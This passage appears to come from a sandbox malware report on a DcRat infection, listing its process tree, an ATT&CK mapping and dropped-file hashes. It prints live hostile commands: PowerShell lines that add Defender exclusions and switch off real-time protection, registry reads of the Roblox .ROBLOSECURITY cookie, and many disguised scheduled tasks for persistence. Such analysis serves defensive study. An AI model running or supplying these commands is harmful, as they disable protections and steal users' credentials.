      - C:\Users\Admin\AppData\Roaming\discord\savesref.exe
        
        "C:\Users\Admin\AppData\Roaming\discord\savesref.exe"
        6⤵
        DcRat
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1340
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6qhBZ49x50.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3184
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2692
        
        C:\Users\Default\Application Data\sihost.exe
        
        "C:\Users\Default\Application Data\sihost.exe"
        8⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        System policy modification
        
        PID:3444
- - C:\Users\Admin\AppData\Local\Temp\explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\explorer.exe"
      4⤵
      DcRat
      Views/modifies file attributes
      PID:3036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:8
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1312
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:404
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2952
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3828
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:748
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\explorer.exe" && pause
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4716
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:4888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 7 /tr "'C:\Windows\L2Schemas\TextInputHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Windows\L2Schemas\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Application Data\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Application Data\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Application Data\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Java\StartMenuExperienceHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Java\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 5 /tr "'C:\Windows\L2Schemas\unsecapp.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\L2Schemas\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\unsecapp.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Microsoft Shared\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\DESIGNER\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\DESIGNER\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\GameBarPresenceWriter\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\GameBarPresenceWriter\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Idle.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows NT\sihost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\sihost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\StartMenuExperienceHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\Globalization\Sorting\conhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Globalization\Sorting\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Windows\Globalization\Sorting\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2228

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1512

C:\Windows\GameBarPresenceWriter\spoolsv.exe
C:\Windows\GameBarPresenceWriter\spoolsv.exe
1⤵
- Executes dropped EXE
PID:408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\Java\RCX61C0.tmp

Filesize
1.5MB

MD5
bf164fec3cd078761a70462be31050fb

SHA1
48ebbb45426cbe2056e5f0bca1bd03e06ddfa5a2

SHA256
1d547dd97ae48345cae40c0a76258b3efa12dd8e9ea689f3d022e482584aa173

SHA512
fc4dbc0aa8d172b2b6c706e778acf5e49a5fc4c1c1fa763bd01a6d4332f1731ae5a87bfb500027067c3bb1b7508326c81b0462c08667b2b7a68bdc1ec38e748b

Download Submit
C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe

Filesize
1.5MB

MD5
e1ac4dd4b691b50e9bb5a1f9069ee824

SHA1
5c66d955f2bf4c01e513a4cc96f3ae7bf498c9e5

SHA256
2f852f760f30e33745ea021d4ef54231ecbd81ae2014cb601e2b1ed338db4227

SHA512
dacb4c52cd6c052f51f34fa2bb69fafb0750b7ea13f4a95e115d487529e6804c67fe21ff22d2c5c83dc559f72a4a970ad3ebb08b9a2203b85fcd7c60db6598a0

Download Submit
C:\Recovery\WindowsRE\Registry.exe

Filesize
1.5MB

MD5
c140787f2f6f5ad497bd3728198b2232

SHA1
1ebd8a2b883c87eadbd6e1fc0e06f77e35851015

SHA256
fe94b425a973e2b40b7d60d0b350bc7142b2db26f7a34f5eedaf1b31d402bb84

SHA512
bb2110253215c36331f5ee38eaeef3dc6f3e8809ae88585106f38a51e9499122bfb1394e97dec1b2d312eccb53b3759e5d504aad71212cbe7a8336f72a7e1aa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
58b80fe8da7d23cd3c9707f4ce93457e

SHA1
7d1c58b992631d82cabd38d738ccca072c91c124

SHA256
4479db3e2faf952801a1506140f3612e267e9bb4f5d509b0d63204429de8eef3

SHA512
82ef5d29aaf46b5fef467185193f03612058c4bbd7b9926293a79c18deefe137811f95dc59feaa649376c8711ca3253177177b538d2d953147db1ed719cba5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
17d8127be94d3c1b6fcc9a4ed585003e

SHA1
789874fcc7c778c723f3e89822d8cc8750c6c4c8

SHA256
ea357ad1f95863b3618d31e5b0f90495331f64de2b784d9e185b48668c937a7b

SHA512
bb18b6d07d82227f5cfbe3eb460df79ec892c560ad2964dcd4782aa26336ae15059843bf46a739bdd4a4daa58057f99102531a756a1cf434ce6449b3cd35a98e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6qhBZ49x50.bat

Filesize
209B

MD5
eeb09c1f2fc832dd7012cc6d1750c62c

SHA1
12645a863f749e84fe79a83a569d970885dd3c91

SHA256
5e57f86c95980fec6d7b750d14b7e46db02b38ca5bf305cab7b9fd281641cb5e

SHA512
8ddd8ce3a31c4fb3af49be3a7be1ef86731feb382573bf1aa1be4a91e0b19d01bb7986995860c7f6176b22103987484309f2d273deb102fd80d9386c7a0c13df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trfeixts.w2u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\explorer.exe

Filesize
231KB

MD5
5a006cd74e0225a15746bee6928d62f1

SHA1
a17dabdb634d9667c3590436998252148a5fab92

SHA256
0350fdb32852f781665e056a04f318e94c746612f7b4e3cd430d808c894aae4c

SHA512
59d6b467cf48cf1aafaf13e1acfdd6ae4806403f0bc92e759590b04da4ecd719488300ecd412d92931e7b65daf0ab2229d7a165b31595334676b40942bb30f81

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
1.8MB

MD5
45008c4cc3fc25a5d5184742ae2fe72b

SHA1
f5e7b3110df6917df0e07a822c313c52eec335fd

SHA256
09d240d54a5458bcc9362ea0f06e23a345b69e196e127462d5f33e8a475ccd57

SHA512
3059e4e59cb103f08fd13f776bf65d41b4cfec7a7f6610a2c945e134d4b913185f64bdf357bbc3c52e26da77f9e04a19c121611ad11fb40bf486aade1751e335

Download Submit
C:\Users\Admin\AppData\Roaming\discord\91XI5GEPShJXCgG0eVHRJ.bat

Filesize
32B

MD5
84814a18997996f8a95ba8e868396e90

SHA1
30b79b2158d922433ba25117fb79f8720470fb44

SHA256
92c8ccb6b3a9abc0798ad760255c47356c3750a74b11e38590876c68927f3797

SHA512
b1b820e12c49fe4993229222a218a769e5d6913f303d382baaff735f3b24a5b068adcfb344397004dd9d7aa637c4e9baedf2e3ca3dfb3f56e86c8c8f8cf9cf7e

Download Submit
C:\Users\Admin\AppData\Roaming\discord\KVGHJrchTtXZ1.vbe

Filesize
212B

MD5
cdb5dc99d1017d58fdbfce66f048da76

SHA1
e1903f365d81996da9810b9f0dc40bc65b3324c7

SHA256
bd9e0e5f3e6379d03907896d71843cc2dbfef7e209cc0896b4755fa0422a3b43

SHA512
72e3e2f3b5f385c402faf7ac89690a99806f648f90e85f46b01db66284f247c10dbe03e612e41c46775cd29fecaeede2fd26bc8dc2e22e252f9f1ce9b801f88d

Download Submit
C:\Users\Admin\AppData\Roaming\discord\savesref.exe

Filesize
1.5MB

MD5
0a32536cc1d5e2a35d7d289b4ff0e76b

SHA1
98736b0b5a6f3709f81365c9e6477819074c3170

SHA256
8d31ae46e123de0d23937d664298428e37b45a7a135a95d73f5887779ee48710

SHA512
b2d5d91eb7ecfc6eb295c63ecba5c3ceb4b4a865fc9a9f90bd1e82bff4bc39905baf9ab2962580ee708761632e5499694f3f823aa2f139bce809398262eb3b73

Download Submit
C:\Users\Default\AppData\Roaming\sihost.exe

Filesize
1.5MB

MD5
9d38cf1e1724851cb98903a3e4b630a2

SHA1
d8d1786741cbed0acbf5a3b79fd20f09fc63e7d3

SHA256
6979bcc72e31065cbbec7856e08b7f43a6d0859d85bff104805b2d1929fe80cf

SHA512
f1bab3e2735e2e3d6d0da0689e4278c11ea3f287e60212dca9e2969de73ec767a9e7d0ae6f92633b4edc13f4cd95f8b224ae4717f50fe93c392ae4aca36218bd

Download Submit
C:\Users\Default\RuntimeBroker.exe

Filesize
1.5MB

MD5
2c3b9d3c539233e14b02e731cad72c8c

SHA1
05be969205da5664ba1ab8503b22ce512aec7860

SHA256
ddfcdb81f6e9164e04ee4a62325473fbb0ea3d84a4380ec4fee782bc5d7d346f

SHA512
4b1ca71e747e8d7ce723581e5534c700f818d6c4b12805a82e263f3138632453f71646f7963db65fbe2f5450d22152b9206810edd998a0de30fde7a462bcd98f

Download Submit
C:\Windows\L2Schemas\RCX6BDA.tmp

Filesize
1.5MB

MD5
63eb9ebe74f533bd4a5020ecdd17e71d

SHA1
51f2e1779db123cb48f25a3b4fba445e65c01238

SHA256
8d56790ff0449bb488afcf6dea4831d47c0e9e324c95a15978c4583cee2737ed

SHA512
62b893ca7a35bc18a787cbe2d2651f7a53cab2146a48452b2d8d5782a1055839506b749c2995fb095d4888892f53470a28acef6bd5bd277c614cfb037813c287

Download Submit
C:\Windows\L2Schemas\TextInputHost.exe

Filesize
1.5MB

MD5
8ba4e01b1093196db14db9dd6b102789

SHA1
8fe5f18624ffd6b4f6d82791a5a9fb69ed97fcc9

SHA256
01d8ecff77756038f5527f53cf8c73196ba5206983d0485b7b12bb0dac513103

SHA512
d63595b3f8d79cd2ef92b52b4d1c96711fa8e98a7515b3701b67932b32430132bd39d0b611b246c2c29491a0b36f8c8d814248f632ed492236ca581ffa2106ef

Download Submit
memory/408-399-0x0000000000020000-0x00000000001AC000-memory.dmp

Filesize
1.5MB

Download
memory/1340-133-0x000000001BD70000-0x000000001BD78000-memory.dmp

Filesize
32KB

Download
memory/1340-135-0x000000001BD90000-0x000000001BD9C000-memory.dmp

Filesize
48KB

Download
memory/1340-131-0x000000001B850000-0x000000001B858000-memory.dmp

Filesize
32KB

Download
memory/1340-137-0x000000001BDB0000-0x000000001BDBC000-memory.dmp

Filesize
48KB

Download
memory/1340-134-0x000000001BD80000-0x000000001BD88000-memory.dmp

Filesize
32KB

Download
memory/1340-136-0x000000001BDA0000-0x000000001BDAA000-memory.dmp

Filesize
40KB

Download
